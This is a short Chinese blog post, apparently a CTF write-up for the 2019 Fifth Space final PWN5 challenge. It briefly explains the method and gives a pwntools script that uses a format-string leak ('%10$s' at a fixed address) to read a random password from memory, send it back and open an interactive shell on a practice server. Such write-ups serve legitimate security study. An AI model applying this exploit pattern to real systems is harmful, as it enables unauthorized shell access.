[第五空间2019 决赛]PWN5比较另类的解法

小子不要笑

于 2020-09-28 16:37:36 发布

阅读量292

点赞数 1

CC 4.0 BY-SA版权

本文链接：https://blog.csdn.net/qq_43766802/article/details/108852533

该博客内容涉及网络安全，具体讲述了如何通过格式化字符串漏洞泄露内存中的nptr随机数，然后利用泄露的信息输入特定密码，最终实现远程服务器的getshell操作。主要技术涉及pwn模块、内存地址定位及交互式会话。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

利用格式化字符串漏洞泄漏nptr的随机数，再输入

getshell

from pwn import *
context.log_level='debug'
io=remote("node3.buuoj.cn",26613)
buf=0x0804c044
password=""
payload=p32(buf)+b'%10$s'
io.recv()
io.sendline(payload)
io.recvuntil("Hello,D"+'\xc0\x04\x08')
password=u32(io.recv(4))
io.sendline(str(password))
io.interactive()